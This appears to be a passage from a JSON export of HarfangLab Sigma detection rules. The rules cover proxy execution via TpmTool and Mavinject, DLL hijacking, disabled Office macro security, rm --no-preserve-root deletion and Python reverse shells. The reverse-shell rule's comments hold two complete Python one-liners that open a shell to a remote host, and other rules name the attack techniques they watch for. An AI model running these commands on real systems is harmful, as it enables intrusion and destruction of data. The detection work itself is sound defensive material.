"https://twitter.com/0gtweet/status/1581185123218690048",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_tpmtool.yml",
"content": "title: Proxy Execution via TpmTool.exe\nid: 30bfe7ff-3444-4e5a-9e30-cb0e5a88ff28\ndescription: |\n Detects the suspicious execution of TpmTool.exe as a proxy to launch another application.\n Attackers must place a malicious logman.exe file in the same folder as TpmTool, which will then be executed.\n This technique can be used to bypass security restrictions that are based on the parent process.\n It is recommended to analyze the the execution chain to look for malicious processes as well as to analyze the logman.exe process and determine its legitimacy.\nreferences:\n - https://twitter.com/0gtweet/status/1581185123218690048\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/10/27\nmodified: 2025/01/13\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.TpmTool\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_grandparent:\n GrandparentCommandLine|contains|all:\n - 'drivertracing'\n - 'stop'\n\n selection_parent:\n ParentCommandLine|endswith: '\\cmd.exe /c logman.exe stop TPMTRACE -ets'\n\n filter_legitimate:\n OriginalFileName: 'Logman.exe'\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n condition: all of selection_* and not 1 of filter_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "30bfe7ff-3444-4e5a-9e30-cb0e5a88ff28",
"rule_name": "Proxy Execution via TpmTool.exe",
"rule_description": "Detects the suspicious execution of TpmTool.exe as a proxy to launch another application.\nAttackers must place a malicious logman.exe file in the same folder as TpmTool, which will then be executed.\nThis technique can be used to bypass security restrictions that are based on the parent process.\nIt is recommended to analyze the the execution chain to look for malicious processes as well as to analyze the logman.exe process and determine its legitimacy.\n",
"rule_creation_date": "2022-10-27",
"rule_modified_date": "2025-01-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "310c3bfc-817d-4a9b-bcb8-d1c7a7835b67",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588794Z",
"creation_date": "2026-03-23T11:45:34.588797Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588805Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_cmdl32.yml",
"content": "title: DLL Hijacking via cmdl32.exe\nid: 310c3bfc-817d-4a9b-bcb8-d1c7a7835b67\ndescription: |\n Detects potential Windows DLL Hijacking via cmdl32.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'cmdl32.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\cmpbk32.dll'\n - '\\RASAPI32.dll'\n - '\\rasman.dll'\n - '\\WINHTTP.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "310c3bfc-817d-4a9b-bcb8-d1c7a7835b67",
"rule_name": "DLL Hijacking via cmdl32.exe",
"rule_description": "Detects potential Windows DLL Hijacking via cmdl32.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3173c69e-b742-4068-89fd-0dcb22d5d4d1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.093500Z",
"creation_date": "2026-03-23T11:45:34.093502Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.093507Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/",
"https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/"
],
"name": "t1562_001_office_disable_security_policy.yml",
"content": "title: Microsoft Office Security Policy Disabled\nid: 3173c69e-b742-4068-89fd-0dcb22d5d4d1\ndescription: |\n Detects when policy regarding Office applications security is set to disabled.\n This rule is triggered when:\n - macro execution policy is set to allow any macro (signed and unsigned) to execute automatically.\n - a protected view policy is set to be disabled for all documents.\n Some attackers set those values upon compromising endpoints to ease further exploitations in the future.\n It is recommended to investigate the process that set the registry key for suspicious activities.\nreferences:\n - https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\n - https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/\ndate: 2020/09/28\nmodified: 2025/04/24\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n Details: 'DWORD (0x00000001)' # value 1 == No Security checks for macros (Not recommended, code in all documents can run)\n TargetObject:\n # covers \\office\\12.0/14.0/16.0... \\Word / Excel\\Security\\VBAWarnings\n - 'HKU\\\\*\\Software\\Microsoft\\Office\\\\*\\Security\\VBAWarnings'\n # disable Protected View for files downloaded from the internet.\n - 'HKU\\\\*\\Software\\Microsoft\\Office\\\\*\\Security\\ProtectedView\\DisableInternetFilesInPV'\n # disable Protected View for files located in unsafe locations (temporary directories,...)\n - 'HKU\\\\*\\Software\\Microsoft\\Office\\\\*\\Security\\ProtectedView\\DisableUnsafeLocationsInPV'\n # disable Protected View for files containing attachements.\n - 'HKU\\\\*\\Software\\Microsoft\\Office\\\\*\\Security\\ProtectedView\\DisableAttachementsInPV'\n # enable all macros without warns.\n - 'HKU\\\\*\\Software\\Microsoft\\Office\\\\*\\Security\\Level'\n\n # For office we detect only if the modification is related to a suspicious action (via a macro for example)\n selection_office:\n ProcessOriginalFileName:\n - 'Excel.exe'\n - 'Lync.exe'\n - 'MSACCESS.EXE'\n - 'OneNote.exe'\n - 'Outlook.exe'\n - 'POWERPNT.EXE'\n - 'WinWord.exe'\n ProcessSigned: 'true'\n ProcessSignature : 'Microsoft Corporation'\n\n filter_office_ui:\n StackTrace|contains: '\\Mso??UIwin32client.dll!'\n\n exclusion_services:\n Image|endswith:\n - '\\windows\\system32\\svchost.exe'\n - '\\windows\\syswow64\\svchost.exe'\n - '\\windows\\system32\\services.exe'\n\n exclusion_windowsupdate:\n Image: '?:\\$WINDOWS.~BT\\Sources\\setuphost.exe'\n ProcessParentImage:\n - '*\\WindowsUpdateBox.exe'\n - '*\\sources\\setupprep.exe'\n\n exclusion_citrix_profile_manager:\n Image: '?:\\Program Files\\Citrix\\User Profile Manager\\UserProfileManager.exe'\n\n exclusion_ivanti:\n Image:\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pfwsmgr.exe'\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pwrgrid.exe'\n - '?:\\Program Files\\Ivanti\\Ivanti Cloud Agent\\UWM_AC_ENGINE.WIN64\\AMAgent.exe'\n\n exclusion_sagekey:\n Image: '?:\\Program Files (x86)\\Common Files\\Sagekey Software\\StartAccess_2003.exe'\n\n exclusion_ecscad:\n Image: '?:\\Program Files\\MuM MT\\ecscad 2016\\ecscad\\EcsController.exe'\n\n exclusion_msaaccess:\n Image|endswith: '\\MSACCESS.EXE'\n ProcessParentImage|endswith: '\\MSACCESS*.EXE'\n ProcessGrandparentImage|endswith: '\\e.magnus.exe'\n\n exclusion_intersystems:\n ProcessOriginalFileName: 'CWS.exe'\n\n exclusion_share:\n ProcessProcessName:\n - 'reg.exe'\n - 'regedit.exe'\n - 'cscript.exe'\n ProcessCommandLine|contains: '\\\\\\\\'\n\n exclusion_res_software:\n ProcessParentImage: '?:\\Program Files (x86)\\RES Software\\Workspace Manager\\pfwsmgr.exe'\n\n exclusion_magnus:\n ProcessGrandparentImage: '?:\\Program Files (x86)\\BL\\BL\\bin\\e.magnus.exe'\n\n exclusion_loadstate:\n ProcessOriginalFileName: 'LoadState.exe'\n ProcessSigned: 'true'\n ProcessSignature : 'Microsoft Corporation'\n\n exclusion_aucotec:\n ProcessImage: '?:\\Program Files (x86)\\Aucotec\\Engineering Base *\\bin\\EngineeringBase.exe'\n ProcessSigned: 'true'\n ProcessSignature : 'AUCOTEC AG'\n\n exclusion_natus:\n ProcessOriginalFileName:\n - 'Wave.exe'\n - 'XLDB.EXE'\n ProcessSigned: 'true'\n ProcessSignature : 'Natus Medical Incorporated'\n\n exclusion_immidio:\n ProcessParentImage: '?:\\Program Files\\Immidio\\Flex Profiles\\FlexService.exe'\n\n condition: ((selection and not selection_office) or (selection and selection_office and not filter_office_ui)) and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3173c69e-b742-4068-89fd-0dcb22d5d4d1",
"rule_name": "Microsoft Office Security Policy Disabled",
"rule_description": "Detects when policy regarding Office applications security is set to disabled.\nThis rule is triggered when:\n - macro execution policy is set to allow any macro (signed and unsigned) to execute automatically.\n - a protected view policy is set to be disabled for all documents.\nSome attackers set those values upon compromising endpoints to ease further exploitations in the future.\nIt is recommended to investigate the process that set the registry key for suspicious activities.\n",
"rule_creation_date": "2020-09-28",
"rule_modified_date": "2025-04-24",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "31777514-089e-478f-8335-ce2e3f30e79e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.597347Z",
"creation_date": "2026-03-23T11:45:34.597353Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.597364Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://man7.org/linux/man-pages/man1/rm.1.html",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md#atomic-test-8---delete-filesystem---linux",
"https://attack.mitre.org/techniques/T1485/",
"https://attack.mitre.org/techniques/T1070/004/"
],
"name": "t1485_delete_filesystem_linux.yml",
"content": "title: Filesystem Deletion\nid: 31777514-089e-478f-8335-ce2e3f30e79e\ndescription: |\n Detects the execution of rm, a command to remove files or directories with a specific option related to filesystem deletion.\n Adversaries may delete filesystems to hide their intrusion activity or to perform data destruction.\n It is recommended to investigate previous alerts on this machine to hunt for any malicious activity.\nreferences:\n - https://man7.org/linux/man-pages/man1/rm.1.html\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md#atomic-test-8---delete-filesystem---linux\n - https://attack.mitre.org/techniques/T1485/\n - https://attack.mitre.org/techniques/T1070/004/\ndate: 2023/01/06\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1485\n - attack.defense_evasion\n - attack.t1070.004\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Deletion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/rm'\n CommandLine|contains: '--no-preserve-root'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "31777514-089e-478f-8335-ce2e3f30e79e",
"rule_name": "Filesystem Deletion",
"rule_description": "Detects the execution of rm, a command to remove files or directories with a specific option related to filesystem deletion.\nAdversaries may delete filesystems to hide their intrusion activity or to perform data destruction.\nIt is recommended to investigate previous alerts on this machine to hunt for any malicious activity.\n",
"rule_creation_date": "2023-01-06",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.impact"
],
"rule_technique_tags": [
"attack.t1070.004",
"attack.t1485"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "319422fe-e9e9-4e50-becd-b946bfa14f25",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619443Z",
"creation_date": "2026-03-23T11:45:34.619445Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619449Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux",
"https://attack.mitre.org/techniques/T1059/006/"
],
"name": "t1059_006_reverse_shell_python_linux.yml",
"content": "title: Reverse Shell Executed via Python (Linux)\nid: 319422fe-e9e9-4e50-becd-b946bfa14f25\ndescription: |\n Detects the suspicious usage of Python related to reverse shells.\n Reverse shells are remote shell connections initiated from a compromised system to a malicious client as a way to bypass firewall rules.\n It is recommended to investigate the process behavior and command-line arguments to determine if the Python execution is legitimate or indicative of malicious activity such as establishing a reverse shell connection.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://attack.mitre.org/techniques/T1059/006/\ndate: 2022/07/01\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.006\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Script.Python\n - classification.Linux.Behavior.RemoteShell\nlogsource:\n category: process_creation\n product: linux\ndetection:\n # export RHOST=\"127.0.0.1\";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")'\n # python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n selection_command:\n CommandLine|contains|all:\n - 'import'\n - 'socket'\n - '.socket('\n - '.connect('\n - 'os.dup2('\n - 'fileno()'\n\n selection_shell:\n CommandLine|contains:\n - '.spawn('\n - '.call('\n\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "319422fe-e9e9-4e50-becd-b946bfa14f25",
"rule_name": "Reverse Shell Executed via Python (Linux)",
"rule_description": "Detects the suspicious usage of Python related to reverse shells.\nReverse shells are remote shell connections initiated from a compromised system to a malicious client as a way to bypass firewall rules.\nIt is recommended to investigate the process behavior and command-line arguments to determine if the Python execution is legitimate or indicative of malicious activity such as establishing a reverse shell connection.\n",
"rule_creation_date": "2022-07-01",
"rule_modified_date": "2025-02-19",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "319b37d1-f75a-4426-9484-efa3e3788527",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592677Z",
"creation_date": "2026-03-23T11:45:34.592681Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592689Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_licensingdiag.yml",
"content": "title: DLL Hijacking via licensingdiag.exe\nid: 319b37d1-f75a-4426-9484-efa3e3788527\ndescription: |\n Detects potential Windows DLL Hijacking via licensingdiag.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'licensingdiag.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\CLIPC.dll'\n - '\\fastprox.dll'\n - '\\licensingdiagspp.dll'\n - '\\propsys.dll'\n - '\\rsaenh.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n - '\\windows.storage.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "319b37d1-f75a-4426-9484-efa3e3788527",
"rule_name": "DLL Hijacking via licensingdiag.exe",
"rule_description": "Detects potential Windows DLL Hijacking via licensingdiag.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "31ccdc74-069f-43fc-87d2-615dcae0c977",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070652Z",
"creation_date": "2026-03-23T11:45:34.070654Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070658Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Mavinject/",
"https://attack.mitre.org/techniques/T1218/013/",
"https://attack.mitre.org/techniques/T1055/001/"
],
"name": "t1218_013_mavinject.yml",
"content": "title: Proxy Execution via Mavinject\nid: 31ccdc74-069f-43fc-87d2-615dcae0c977\ndescription: |\n Detect a suspicious execution of Microsoft Application Virtualization Injector Mavinject.exe to proxy execution of malicious code.\n This binary, which is digitally signed by Microsoft, can be used to inject malicious DLLs into running processes.\n Attackers may abused it to bypass security restrictions.\n It is recommended to ensure that the injected DLL is legitimate.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Mavinject/\n - https://attack.mitre.org/techniques/T1218/013/\n - https://attack.mitre.org/techniques/T1055/001/\ndate: 2022/02/28\nmodified: 2025/06/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.013\n - attack.t1055.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Mavinject\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName:\n - 'mavinject32.exe'\n - 'mavinject64.exe'\n CommandLine|contains: ' /INJECTRUNNING *.dll'\n\n exclusion_appvclient:\n CommandLine:\n - '?:\\WINDOWS\\system32\\mavinject.exe * /INJECTRUNNING ?:\\Windows\\System32\\Subsystems\\AppVEntSubsystems64.dll 1'\n - '?:\\Windows\\SysWOW64\\mavinject.exe * /INJECTRUNNING ?:\\Windows\\System32\\Subsystems\\AppVEntSubsystems32.dll 1'\n ParentImage: '?:\\Windows\\System32\\AppVClient.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "31ccdc74-069f-43fc-87d2-615dcae0c977",
"rule_name": "Proxy Execution via Mavinject",
"rule_description": "Detect a suspicious execution of Microsoft Application Virtualization Injector Mavinject.exe to proxy execution of malicious code.\nThis binary, which is digitally signed by Microsoft, can be used to inject malicious DLLs into running processes.\nAttackers may abused it to bypass security restrictions.\nIt is recommended to ensure that the injected DLL is legitimate.\n",
"rule_creation_date": "2022-02-28",
"rule_modified_date": "2025-06-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055.001",
"attack.t1218.013"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "31dac5b8-d9c0-4cae-865a-9d528c8e6c00",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586826Z",
"creation_date": "2026-03-23T11:45:34.586829Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586837Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_netplwiz.yml",
